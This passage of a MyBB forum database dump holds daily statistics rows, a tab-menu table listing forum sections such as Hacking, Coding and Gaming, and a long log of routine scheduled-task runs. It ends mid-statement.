INSERT INTO mybb_stats VALUES('1343941200', '29', '69', '162'); INSERT INTO mybb_stats VALUES('1344027600', '32', '69', '162'); INSERT INTO mybb_stats VALUES('1344114000', '34', '74', '175'); INSERT INTO mybb_stats VALUES('1344200400', '35', '75', '177'); INSERT INTO mybb_stats VALUES('1344286800', '34', '87', '204'); INSERT INTO mybb_stats VALUES('1344373200', '38', '92', '215'); INSERT INTO mybb_stats VALUES('1344459600', '38', '92', '217'); INSERT INTO mybb_stats VALUES('1344546000', '39', '95', '222'); INSERT INTO mybb_stats VALUES('1344718800', '40', '95', '222'); INSERT INTO mybb_stats VALUES('1344805200', '42', '95', '225'); INSERT INTO mybb_stats VALUES('1344891600', '50', '104', '250'); INSERT INTO mybb_stats VALUES('1344978000', '59', '116', '289'); INSERT INTO mybb_stats VALUES('1345064400', '65', '129', '327'); INSERT INTO mybb_stats VALUES('1345150800', '67', '142', '364'); INSERT INTO mybb_stats VALUES('1345237200', '71', '149', '392'); INSERT INTO mybb_stats VALUES('1345323600', '70', '150', '420'); INSERT INTO mybb_stats VALUES('1345410000', '74', '156', '450'); INSERT INTO mybb_stats VALUES('1345496400', '82', '168', '555'); INSERT INTO mybb_stats VALUES('1345582800', '90', '179', '612'); INSERT INTO mybb_stats VALUES('1345669200', '96', '188', '664'); INSERT INTO mybb_stats VALUES('1345755600', '106', '203', '778'); INSERT INTO mybb_stats VALUES('1345842000', '108', '204', '808'); INSERT INTO mybb_stats VALUES('1345780800', '110', '211', '855'); INSERT INTO mybb_stats VALUES('1345867200', '120', '232', '998'); INSERT INTO mybb_stats VALUES('1345953600', '124', '246', '1076'); INSERT INTO mybb_stats VALUES('1346040000', '129', '262', '1176'); INSERT INTO mybb_stats VALUES('1346126400', '133', '270', '1268'); INSERT INTO mybb_stats VALUES('1346212800', '139', '280', '1318'); INSERT INTO mybb_stats VALUES('1346299200', '150', '288', '1340'); INSERT INTO mybb_stats VALUES('1346385600', '154', '297', '1381'); INSERT INTO mybb_stats VALUES('1346472000', '157', '297', '1393'); INSERT INTO mybb_stats VALUES('1346558400', '157', '304', '1434'); INSERT INTO mybb_stats VALUES('1346644800', '159', '320', '1496'); INSERT INTO mybb_stats VALUES('1346731200', '165', '329', '1559'); INSERT INTO mybb_stats VALUES('1346817600', '169', '335', '1583'); INSERT INTO mybb_stats VALUES('1346904000', '171', '347', '1628'); INSERT INTO mybb_stats VALUES('1346990400', '171', '348', '1643'); INSERT INTO mybb_stats VALUES('1347076800', '173', '353', '1663'); INSERT INTO mybb_stats VALUES('1347163200', '174', '371', '1718'); INSERT INTO mybb_stats VALUES('1347249600', '174', '377', '1744'); INSERT INTO mybb_stats VALUES('1347336000', '175', '381', '1781'); INSERT INTO mybb_stats VALUES('1347422400', '175', '386', '1813'); INSERT INTO mybb_stats VALUES('1347508800', '175', '404', '1861'); INSERT INTO mybb_stats VALUES('1347595200', '180', '425', '1977'); INSERT INTO mybb_stats VALUES('1347681600', '183', '438', '2062'); INSERT INTO mybb_stats VALUES('1347768000', '183', '455', '2154'); INSERT INTO mybb_stats VALUES('1347854400', '185', '461', '2239'); INSERT INTO mybb_stats VALUES('1347940800', '185', '467', '2274'); INSERT INTO mybb_stats VALUES('1348027200', '186', '478', '2329'); INSERT INTO mybb_stats VALUES('1348113600', '187', '486', '2361'); INSERT INTO mybb_stats VALUES('1348200000', '187', '488', '2387'); INSERT INTO mybb_stats VALUES('1348286400', '187', '489', '2400'); INSERT INTO mybb_stats VALUES('1348372800', '187', '490', '2454'); INSERT INTO mybb_stats VALUES('1348459200', '190', '506', '2515'); INSERT INTO mybb_stats VALUES('1348545600', '190', '509', '2545'); INSERT INTO mybb_stats VALUES('1348632000', '191', '520', '2600'); INSERT INTO mybb_stats VALUES('1348718400', '192', '524', '2647'); INSERT INTO mybb_stats VALUES('1348804800', '195', '546', '2709'); INSERT INTO mybb_stats VALUES('1348891200', '199', '593', '2864'); INSERT INTO mybb_stats VALUES('1348977600', '203', '621', '3011'); INSERT INTO mybb_stats VALUES('1349064000', '205', '635', '3112'); INSERT INTO mybb_stats VALUES('1349150400', '206', '640', '3156'); INSERT INTO mybb_stats VALUES('1349236800', '206', '643', '3212'); INSERT INTO mybb_stats VALUES('1349308800', '209', '652', '3313'); INSERT INTO mybb_stats VALUES('1349395200', '215', '678', '3451'); INSERT INTO mybb_stats VALUES('1349481600', '217', '718', '3654'); INSERT INTO mybb_stats VALUES('1349568000', '198', '735', '3742'); INSERT INTO mybb_stats VALUES('1349582400', '196', '746', '3792'); INSERT INTO mybb_stats VALUES('1349654400', '203', '758', '3885'); INSERT INTO mybb_stats VALUES('1349668800', '201', '760', '3900'); INSERT INTO mybb_stats VALUES('1349740800', '204', '771', '3996'); INSERT INTO mybb_stats VALUES('1349755200', '202', '761', '3917'); INSERT INTO mybb_stats VALUES('1349827200', '204', '780', '4064'); INSERT INTO mybb_stats VALUES('1349913600', '206', '795', '4160'); INSERT INTO mybb_stats VALUES('1350000000', '208', '808', '4222'); INSERT INTO mybb_stats VALUES('1350086400', '212', '832', '4436'); INSERT INTO mybb_stats VALUES('1350172800', '216', '841', '4550'); INSERT INTO mybb_stats VALUES('1350259200', '216', '861', '4679'); INSERT INTO mybb_stats VALUES('1350345600', '220', '879', '4820'); INSERT INTO mybb_stats VALUES('1350432000', '224', '902', '5050'); INSERT INTO mybb_stats VALUES('1350518400', '229', '956', '5348'); INSERT INTO mybb_stats VALUES('1350446400', '224', '909', '5106'); INSERT INTO mybb_stats VALUES('1350604800', '233', '971', '5497'); INSERT INTO mybb_stats VALUES('1350691200', '233', '991', '5680'); INSERT INTO mybb_stats VALUES('1350705600', '232', '977', '5528'); INSERT INTO mybb_stats VALUES('1350777600', '233', '1017', '5873'); INSERT INTO mybb_stats VALUES('1350864000', '236', '1042', '6036'); INSERT INTO mybb_stats VALUES('1350878400', '233', '1024', '5915'); INSERT INTO mybb_stats VALUES('1350950400', '237', '1047', '6093'); INSERT INTO mybb_stats VALUES('1351036800', '240', '1057', '6156'); INSERT INTO mybb_stats VALUES('1351123200', '202', '1073', '6247'); INSERT INTO mybb_stats VALUES('1351051200', '202', '1062', '6182'); INSERT INTO mybb_stats VALUES('1351209600', '204', '1086', '6322'); INSERT INTO mybb_stats VALUES('1351296000', '209', '1094', '6368'); INSERT INTO mybb_stats VALUES('1351382400', '212', '1103', '6417'); INSERT INTO mybb_stats VALUES('1351468800', '215', '1113', '6488'); INSERT INTO mybb_stats VALUES('1351555200', '217', '1117', '6543'); INSERT INTO mybb_stats VALUES('1351641600', '218', '1138', '6641'); INSERT INTO mybb_stats VALUES('1351728000', '223', '1151', '6736'); INSERT INTO mybb_stats VALUES('1351814400', '225', '1155', '6785'); INSERT INTO mybb_stats VALUES('1351900800', '228', '1162', '6829'); INSERT INTO mybb_stats VALUES('1351915200', '228', '1162', '6826'); INSERT INTO mybb_stats VALUES('1351987200', '230', '1166', '6871'); INSERT INTO mybb_stats VALUES('1352073600', '233', '1167', '6877'); INSERT INTO mybb_stats VALUES('1352160000', '237', '1181', '6978'); INSERT INTO mybb_stats VALUES('1352246400', '236', '1195', '7062'); INSERT INTO mybb_stats VALUES('1352178000', '235', '1181', '6992'); INSERT INTO mybb_stats VALUES('1352332800', '241', '1202', '7094'); INSERT INTO mybb_stats VALUES('1352419200', '246', '1207', '7132'); INSERT INTO mybb_stats VALUES('1352505600', '250', '1224', '7262'); INSERT INTO mybb_stats VALUES('1352592000', '253', '1229', '7340'); INSERT INTO mybb_stats VALUES('1352678400', '253', '1229', '7339'); DROP TABLE IF EXISTS mybb_tabmenu; CREATE TABLE mybb_tabmenu ( tabid smallint(3) NOT NULL auto_increment, tabname varchar(64) NOT NULL, tabcats varchar(255) NOT NULL, PRIMARY KEY (tabid) ); INSERT INTO mybb_tabmenu VALUES('6', 'General ', '1,6'); INSERT INTO mybb_tabmenu VALUES('5', 'Hacking', '10'); INSERT INTO mybb_tabmenu VALUES('12', ' Coding', '51'); INSERT INTO mybb_tabmenu VALUES('13', 'Computing', '22'); INSERT INTO mybb_tabmenu VALUES('24', 'Groups', '57'); INSERT INTO mybb_tabmenu VALUES('23', 'Upgraded', '26,31'); INSERT INTO mybb_tabmenu VALUES('22', 'Gaming', '70'); INSERT INTO mybb_tabmenu VALUES('25', 'Graphics', '32'); DROP TABLE IF EXISTS mybb_tasklog; CREATE TABLE mybb_tasklog ( lid int(10) unsigned NOT NULL auto_increment, tid int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, data text NOT NULL, PRIMARY KEY (lid) ); INSERT INTO mybb_tasklog VALUES('14706', '9', '1351999565', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14705', '5', '1351999193', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14704', '7', '1351998076', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14703', '1', '1351998020', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14702', '3', '1351997957', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14701', '9', '1351997955', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14700', '5', '1351997220', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14699', '7', '1351997133', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14698', '1', '1351996899', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14697', '3', '1351994424', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14696', '9', '1351994266', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14695', '5', '1351993594', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14694', '9', '1351993594', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14693', '3', '1351993591', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14692', '5', '1351992441', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14691', '9', '1351992337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14690', '5', '1351992027', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14689', '7', '1351992024', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14688', '1', '1351992017', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14687', '3', '1351990837', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14686', '9', '1351990736', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14685', '5', '1351989981', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14684', '9', '1351989630', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14683', '3', '1351989508', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14682', '9', '1351989327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14681', '5', '1351989306', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14680', '9', '1351988093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14679', '5', '1351988080', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14678', '11', '1351987999', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14677', '7', '1351987992', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14676', '2', '1351987990', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14675', '1', '1351987538', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14674', '3', '1351987436', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14673', '9', '1351986923', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14672', '5', '1351986435', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14671', '9', '1351986062', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14670', '3', '1351985416', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14669', '9', '1351985342', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14668', '5', '1351985338', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14667', '9', '1351984221', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14666', '5', '1351983909', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14665', '7', '1351983602', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14664', '1', '1351983602', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14663', '3', '1351983552', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14662', '9', '1351983319', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14661', '5', '1351982851', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14660', '9', '1351982841', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14659', '3', '1351981986', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14658', '9', '1351981982', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14657', '5', '1351981975', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14656', '9', '1351981160', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14655', '5', '1351980356', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14654', '7', '1351980354', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14653', '1', '1351980313', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14652', '3', '1351980300', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14651', '9', '1351979735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14650', '5', '1351979517', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14649', '3', '1351978850', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14648', '5', '1351978847', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14647', '9', '1351978843', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14646', '5', '1351977052', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14645', '7', '1351977050', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14644', '1', '1351977046', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14643', '3', '1351976719', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14642', '9', '1351976718', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14641', '5', '1351975739', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14640', '3', '1351975487', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14639', '5', '1351975430', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14638', '9', '1351975426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14637', '5', '1351973320', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14636', '7', '1351973313', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14635', '1', '1351973292', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14634', '3', '1351973128', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14633', '9', '1351973112', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14632', '5', '1351972986', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14631', '9', '1351971629', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14630', '3', '1351971009', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14629', '9', '1351971003', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14628', '5', '1351970994', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14627', '7', '1351970228', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14626', '1', '1351970104', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14625', '3', '1351970095', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14624', '9', '1351969491', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14623', '5', '1351968316', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14622', '9', '1351968255', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14621', '3', '1351967401', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14620', '9', '1351967327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14619', '5', '1351967276', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14618', '9', '1351966790', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14617', '5', '1351966058', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14616', '7', '1351966014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14615', '1', '1351965605', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14614', '3', '1351965567', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14613', '9', '1351965560', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14612', '3', '1351964897', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14611', '9', '1351964887', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14610', '5', '1351964751', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14609', '9', '1351963295', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14608', '5', '1351963270', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14607', '7', '1351963239', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14606', '1', '1351963130', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14605', '3', '1351962049', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14604', '9', '1351962018', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14603', '5', '1351961118', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14602', '9', '1351960902', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14601', '3', '1351960409', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14600', '9', '1351960081', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14599', '5', '1351960065', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14598', '9', '1351959318', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14597', '5', '1351958960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14596', '7', '1351958958', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14595', '1', '1351958954', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14594', '3', '1351958950', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14593', '9', '1351958188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14592', '5', '1351957723', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14591', '3', '1351957719', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14590', '9', '1351957404', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14589', '5', '1351957396', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14588', '9', '1351955433', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14587', '5', '1351955426', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14586', '7', '1351954875', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14585', '1', '1351954864', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14584', '3', '1351954847', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14583', '9', '1351954844', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14582', '5', '1351954237', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14581', '9', '1351954071', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14580', '3', '1351953185', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14579', '9', '1351953180', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14578', '5', '1351953133', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14577', '7', '1351953127', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14576', '1', '1351951471', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14575', '3', '1351951450', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14574', '9', '1351950962', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14573', '5', '1351950684', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14572', '9', '1351950671', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14571', '3', '1351949786', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14570', '9', '1351949173', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14569', '5', '1351949158', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14568', '9', '1351948206', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14567', '5', '1351948146', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14566', '7', '1351948146', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14565', '1', '1351948139', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14564', '3', '1351948137', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14563', '9', '1351947749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14562', '7', '1351946815', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14561', '5', '1351946820', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14560', '1', '1351946808', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14559', '3', '1351946799', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14558', '9', '1351946768', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14557', '5', '1351943140', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14556', '9', '1351942940', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14555', '3', '1351942582', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14554', '5', '1351942396', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14553', '9', '1351942392', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14552', '5', '1351940709', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14551', '7', '1351940501', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14550', '1', '1351940501', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14549', '3', '1351940497', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14548', '9', '1351940492', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14547', '5', '1351940446', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14546', '9', '1351937555', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14545', '5', '1351937142', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14544', '7', '1351936936', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14543', '1', '1351936922', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14542', '3', '1351936752', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14541', '9', '1351936650', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14540', '5', '1351936636', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14539', '7', '1351936607', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14538', '1', '1351936598', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14537', '3', '1351936597', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14536', '9', '1351936492', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14535', '9', '1351932646', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14534', '7', '1351932644', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14533', '5', '1351932644', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14532', '1', '1351932637', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14531', '3', '1351932183', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14530', '9', '1351931447', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14529', '5', '1351925130', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14528', '9', '1351924947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14527', '3', '1351924268', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14526', '9', '1351924255', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14525', '5', '1351924046', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14524', '9', '1351923715', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14523', '5', '1351923148', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14522', '7', '1351922478', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14521', '1', '1351922461', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14520', '3', '1351922452', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14519', '9', '1351922446', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14518', '3', '1351921845', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14517', '9', '1351921826', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14516', '5', '1351921515', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14515', '9', '1351919439', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14514', '5', '1351919109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14513', '7', '1351918840', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14512', '1', '1351918834', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14511', '3', '1351918797', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14510', '9', '1351918786', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14509', '5', '1351917903', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14508', '9', '1351917656', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14507', '3', '1351917022', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14506', '9', '1351916902', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14505', '5', '1351916882', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14504', '9', '1351916356', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14503', '5', '1351916193', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14502', '7', '1351915907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14501', '1', '1351915653', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14500', '3', '1351915648', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14499', '9', '1351915513', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14498', '5', '1351914332', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14497', '9', '1351914241', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14496', '3', '1351914211', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14495', '7', '1351913310', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14494', '1', '1351913296', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14493', '3', '1351913203', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14492', '9', '1351913194', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14491', '5', '1351913172', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14490', '9', '1351910471', 'The mass mail task successfully ran.'); INSERT INTO 